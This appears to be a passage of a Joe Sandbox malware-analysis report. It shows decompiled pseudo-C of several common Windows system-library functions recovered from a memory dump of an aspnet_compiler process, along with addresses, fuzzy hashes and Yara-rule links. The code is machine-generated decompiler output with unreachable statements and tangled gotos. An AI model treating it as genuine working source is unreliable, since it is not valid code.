				E0112D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x10b1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0111E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x10b1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E011551BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x10b166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01102AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E010E6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01102C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E010EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01102AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01102C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01102ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0112D0D1(_t62);
				goto L28;
			}

0x01102990
0x01102992
0x01102997
0x011029a3
0x011029a6
0x011029ab
0x011029ad
0x011029b2
0x01145c80
0x011029b8
0x011029b8
0x011029bb
0x011029c0
0x011029c5
0x011029c6
0x011029c6
0x011029cb
0x00000000
0x00000000
0x011029cd
0x011029d0
0x011029d9
0x011029db
0x011029dd
0x01102a7f
0x01102a84
0x01102a87
0x01102a89
0x01145ca1
0x01145ca3
0x00000000
0x01102a8f
0x01102a8f
0x00000000
0x01102a8f
0x00000000
0x011029e3
0x011029e3
0x011029e3
0x00000000
0x011029e3
0x011029dd
0x00000000
0x011029db
0x011029e6
0x011029e9
0x011029eb
0x011029ed
0x011029f3
0x011029f5
0x011029f8
0x011029fa
0x01102a97
0x01102a9a
0x01102a9d
0x01102add
0x00000000
0x01102a9f
0x01102aa2
0x01102aa5
0x01102aa8
0x01102aab
0x01145cab
0x01145caf
0x01145cc5
0x01145cda
0x01145cdc
0x01145cdf
0x01145ce5
0x00000000
0x01145ceb
0x01145ced
0x01145cee
0x00000000
0x01145cee
0x01145cb1
0x01145cb4
0x01145cb9
0x01145cbb
0x00000000
0x01145cbd
0x01145cbd
0x00000000
0x01145cbd
0x01145cbb
0x01102ab1
0x01102ab1
0x01102ac4
0x01102ac6
0x01102ac6
0x00000000
0x01102ac6
0x01102aab
0x00000000
0x01102a00
0x01102a09
0x01102a0e
0x01102a21
0x01102a24
0x01102a35
0x01102a3a
0x01102a3d
0x01102a42
0x01102a59
0x01102a59
0x01102a5c
0x01102a5f
0x01102a5f
0x011029fa
0x011029f3
0x01102a64
0x01102a64
0x01102a6b
0x01102a6b
0x01102a6d
0x01102a72
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3492f9b1e3948c5da5a913e0f4da2563faa571c38617105d7b57f380c8309b5d
Instruction ID: 3c086d4cc8792540f0b5fbf409314515125eee4225964af05e42948b4572de9b
Opcode Fuzzy Hash: 3492f9b1e3948c5da5a913e0f4da2563faa571c38617105d7b57f380c8309b5d
Instruction Fuzzy Hash: C1516931E0021ADFDF2ACF59C884ADEBBB6BF5C314F118115E904AB2A0D7758D92CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01104D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01104D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x11cd360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0111FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x11c7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0111B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L010F4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E010DCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0111B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0111F380(_t67 + 0xc, 0x10b5138, 0x10) == 0) {
								 *0x11c60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01104F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01104E70(0x11c86b0, 0x1105690, 0, 0) != 0) {
					_t46 = E010DCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01104d3b
0x01104d4d
0x01104d53
0x01104d58
0x01104d65
0x01104d6c
0x01104d71
0x01104d77
0x01104d7f
0x01104d8c
0x01104d8e
0x01104dad
0x01104db0
0x01104db7
0x01104db8
0x01104db9
0x01104dba
0x01104dbb
0x01104dc1
0x01104dc8
0x01104dcc
0x01104dd5
0x01104dde
0x01104ddf
0x01104de0
0x01104de1
0x01104de6
0x01104de7
0x01104de9
0x01104df3
0x00000000
0x00000000
0x01146c7c
0x01146c8a
0x01146c8a
0x01146c9d
0x01146ca7
0x01146cac
0x01146cb2
0x01146cb9
0x00000000
0x01146cbf
0x01146cbf
0x00000000
0x01146cbf
0x01146cb9
0x01104dfb
0x01146ccf
0x01146cd3
0x01104e32
0x01104e39
0x01146ce0
0x01146cf2
0x01146cf2
0x01146ce0
0x01104e3f
0x01104e41
0x01104e51
0x01104e51
0x01104e03
0x01104e03
0x01104e09
0x01104e0f
0x01104e57
0x00000000
0x00000000
0x01104e1b
0x01104e30
0x01104e5b
0x01104e5b
0x00000000
0x01104e30
0x01104e11
0x01104e11
0x01104e16
0x00000000
0x01104e16
0x01104e01
0x00000000
0x01104e01
0x01104da5
0x01146c6b
0x00000000
0x01104dab
0x01104dab
0x00000000
0x01104dab

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2204b0a774e179cab254d05a5311dad769835349177b5d739b85e7bb3900b7a6
Instruction ID: 93e9d783caca6980b20710617235ee58e89b78ace59e7655f248cc54ab629896
Opcode Fuzzy Hash: 2204b0a774e179cab254d05a5311dad769835349177b5d739b85e7bb3900b7a6
Instruction Fuzzy Hash: A841F571E443189FEB2ADF14CC80FAAB7A9EB55614F0040A9EA4597681D7B4DD40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01104BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01104BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x11cd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E010DCC50(_t86);
					L11:
					return E0111B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x11c8504
				E010F2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0111FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0111B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L010F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E010DCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x11c8504
								E010EFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01104F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01104bad
0x01104bbf
0x01104bc2
0x01104bc6
0x01104bcd
0x01104bd9
0x011467fe
0x01146800
0x01104ccc
0x01104ccd
0x01104cb7
0x01104cc9
0x01104cc9
0x01104bdf
0x01104be5
0x00000000
0x00000000
0x01104beb
0x01104bef
0x00000000
0x00000000
0x01104bf5
0x01104bf9
0x01104c06
0x01104c0b
0x01104c17
0x01104c1c
0x01104c1f
0x01104c25
0x01104c33
0x01104c3d
0x01104c40
0x01104c43
0x01104c47
0x01104c4d
0x01104c53
0x01104c54
0x01104c55
0x01104c56
0x01104c5b
0x01104c5c
0x01104c63
0x01104c6b
0x00000000
0x00000000
0x01146776
0x01146784
0x01146784
0x0114679f
0x011467a7
0x011467af
0x011467ce
0x00000000
0x011467b1
0x011467b7
0x011467b8
0x011467c1
0x011467d3
0x011467d9
0x011467dd
0x01104c94
0x01104c94
0x01104c98
0x01104c9c
0x01104ca3
0x011467f4
0x011467f4
0x01104cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01104cb5
0x01104c79
0x01104c7e
0x01104c89
0x01104c8b
0x01104c8f
0x01104c8f
0x00000000
0x01104c89
0x011467c3
0x00000000
0x011467c3
0x011467af
0x01104c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c7f9114b152e8bbcffce193016fbb386eaac9cf18931584c1adf6fdb1c67a9
Instruction ID: c8313a61c747b5e4d817fe0807ee417a6e88c6c9b57e079015829468e4301063
Opcode Fuzzy Hash: f0c7f9114b152e8bbcffce193016fbb386eaac9cf18931584c1adf6fdb1c67a9
Instruction Fuzzy Hash: EE41E635E006299BDB29DF68C980BEE77B4FF45710F0100A9EA08AB641DB74DE80CB95

Uniqueness

Uniqueness Score: -1.00%

Function 010E8A0A Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E010E8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x11cd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0111B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E010EE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x10b1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01101DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01113C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E010E8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x010e8a0a
0x010e8a1c
0x010e8a23
0x010e8a2e
0x010e8a30
0x010e8a36
0x010e8a3c
0x010e8a3e
0x010e8a4a
0x010e8a52
0x010e8a9c
0x010e8aae
0x010e8a58
0x010e8a5e
0x010e8a6a
0x010e8a6f
0x010e8a75
0x010e8a7d
0x010e8a85
0x010e8a86
0x010e8a89
0x010e8a93
0x010e8a99
0x010e8a9b
0x00000000
0x010e8aaf
0x010e8abe
0x010e8ac3
0x010e8acb
0x010e8ad7
0x010e8ae0
0x010e8af1
0x00000000
0x010e8af1
0x010e8acd
0x010e8ad5
0x010e8afb
0x010e8afd
0x010e8aff
0x010e8b07
0x010e8b22
0x010e8b24
0x010e8b2a
0x010e8b2e
0x010e8b3f
0x010e8b78
0x010e8b41
0x010e8b52
0x010e8b54
0x010e8b5c
0x010e8b74
0x010e8b74
0x010e8b5c
0x010e8b3f
0x010e8b5e
0x010e8b61
0x010e8b64
0x010e8b64
0x010e8b6c
0x010e8b6c
0x010e8b11
0x01139cd5
0x01139cd5
0x010e8b17
0x010e8b1a
0x010e8b1a
0x00000000
0x010e8ad5
0x010e8a89

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e572340f82aaaf36c0167486b0cf8683f6c65bf5e3860c67e07990f848e27b6e
Instruction ID: 67a29a5109520023efc99093f51ee9401a580defa122effde918e0045017d142
Opcode Fuzzy Hash: e572340f82aaaf36c0167486b0cf8683f6c65bf5e3860c67e07990f848e27b6e
Instruction Fuzzy Hash: 3A417FB0A0022D9FDB64DF5AD88CAE9B7F4FB94300F1485EAD95997242E7709E80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0119FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0119FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0119FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E011A0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E010F7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E01191608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E011A2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0119C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0119DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E010F7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0119A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0119fde7
0x0119fde8
0x0119fdec
0x0119fdee
0x0119fdf5
0x0119fdf7
0x0119fdfc
0x0119fe19
0x0119fe22
0x0119fe26
0x0119fec6
0x0119fecd
0x0119fed5
0x0119fee7
0x0119fed7
0x0119fee0
0x0119fee0
0x0119feef
0x0119ff00
0x0119ff02
0x0119ff07
0x0119ff07
0x00000000
0x0119feef
0x0119fe33
0x0119fe55
0x0119fe59
0x0119fe5b
0x0119fe5e
0x0119fe69
0x0119fe6d
0x0119fe6d
0x0119fe69
0x0119fe35
0x0119fe41
0x0119fe41
0x0119fe79
0x0119fe8b
0x0119fe7b
0x0119fe84
0x0119fe84
0x0119fe93
0x00000000
0x0119fea8
0x0119feba
0x00000000
0x0119feba
0x0119fdfe
0x0119fe01
0x0119fe02
0x0119fe08
0x0119ff0c
0x0119ff14
0x0119ff14

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 67b97cdcccc565771b6612d7934950bd73ee6aaa3a15a72a3422de7377faeb66
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 7E3114323006427FDB2A9B68C844F6ABFA9EB85A50F194058E566CB742DB74DC42C761

Uniqueness

Uniqueness Score: -1.00%

Function 0119EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0119EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E010F2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0119E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E010DF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E010EFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0119AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0119BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E010F7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0118FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E010EFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0119A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0119ea55
0x0119ea66
0x0119ea68
0x0119ea6c
0x0119ea6f
0x0119ea72
0x0119ea75
0x0119ea7a
0x0119ea7a
0x0119ea7e
0x0119ea80
0x0119ea85
0x0119ea8b
0x0119eab5
0x0119eabc
0x0119eabf
0x0119eabf
0x0119eaca
0x0119eace
0x0119ead0
0x0119eae4
0x0119eaeb
0x0119eaf0
0x0119eaf5
0x0119eb09
0x0119eb0d
0x0119eb1d
0x0119eb2d
0x0119eb38
0x0119eb3d
0x0119eb41
0x0119eb4a
0x0119eb60
0x0119eb4c
0x0119eb52
0x0119eb59
0x0119eb59
0x0119eb68
0x0119eb71
0x0119eb71
0x0119ea8d
0x0119ea8f
0x0119ea92
0x0119ea97
0x0119ea97
0x0119ea9b
0x0119ea9c
0x0119ea9e
0x0119eaa6
0x0119eaa6
0x0119eb7e

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity
